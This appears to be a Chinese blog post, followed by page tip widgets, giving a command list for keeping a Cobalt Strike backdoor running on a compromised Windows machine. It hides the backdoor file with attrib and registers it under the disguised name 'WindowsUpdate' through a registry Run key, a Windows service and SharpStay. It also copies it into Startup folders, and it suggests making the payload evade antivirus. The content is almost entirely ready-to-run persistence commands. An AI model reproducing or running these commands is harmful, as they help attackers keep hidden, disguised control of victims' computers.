cobaltstrike权限维持

1.注册表启动
注意:优先用这种方式来进行权限维持
task.exe是CS生成的后门文件,这里后门文件可以对其做免杀
隐藏文件
shell attrib C:\Windows\task.exe   +s +h
注册表启动后门文件
shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d "C:\Windows\task.exe" /f
2.windows服务自动启动
隐藏文件
shell attrib C:\Windows\task.exe   +s +h
服务自动启动执行后门文件
shell sc create "WindowsUpdate"  binpath=  "cmd /c start C:\Windows\task.exe"
shell sc config "WindowsUpdate" start= auto
shell  net start " WindowsUpdate "
或者
3. SharpStay.exe 自动化任务启动
SharpStay.exe action=CreateService servicename=Debug command="C:\Windows\task.exe"
4.自动启动服务目录(win7系统才有效)
shell  copy  " C:\Windows\task.exe"   "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe" /y
或者
copy  "  C:\Windows\task.exe "   " %programdata%\Microsoft\Windows\Start Menu\Programs\Startup \WindowsUpdate.exe" /y
shell  attrib "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe" +s +h
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试中心

各位师傅,觉得文章不错可支持下

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值